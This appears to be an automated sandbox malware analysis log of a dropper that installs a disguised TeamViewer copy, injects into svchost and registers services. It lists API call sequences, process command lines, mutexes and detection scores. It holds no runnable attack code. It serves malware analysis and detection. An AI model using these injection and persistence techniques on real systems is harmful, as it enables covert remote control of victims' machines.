Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,3_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,3_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,6_2_6F338510
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AD39 NtProtectVirtualMemory,6_2_6F33AD39
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33A500 NtQueryVirtualMemory,6_2_6F33A500
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,6_2_6F332750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,6_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,6_2_6F3323B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,6_2_6F337790
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,6_2_6F3319F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B1F0 NtSuspendThread,NtClose,6_2_6F33B1F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33ADE0 NtProtectVirtualMemory,6_2_6F33ADE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread,6_2_6F33AFC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AE20 NtOpenThread,6_2_6F33AE20
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,6_2_6F338400
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,6_2_6F331C00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree,6_2_6F33B270
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,6_2_6F332640
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,6_2_6F33B0A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,6_2_6F334EF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,6_2_6F3314E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,6_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,6_2_6F332ED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3318D0 NtProtectVirtualMemory,6_2_6F3318D0
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_6F333700
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\user\Desktop\77Etc0bR2v.exeJump to behavior
Source: 77Etc0bR2v.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' fJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004C6E36 AdjustTokenPrivileges,3_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewerJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmpJump to behavior
Source: nso5B2F.tmp.1.drBinary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engineClassification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_6F3329D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,2_2_6F333C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,3_2_6F333C60
Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,6_2_6F333C60
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404356
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,2_2_6F3396D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,2_2_6F334E50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile created: C:\Program Files (x86)\QSJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exeStatic file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C101 push ecx; ret 2_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075C004 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053E60D push ecx; ret 3_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053BD8D push ecx; ret 3_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075BFE4 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C101 push ecx; ret 3_2_6F33C114
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C101 push ecx; ret 6_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 11_2_026F4DB0 push esi; ret 11_2_026F4DB1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F703A push ecx; ret 12_3_026F7042
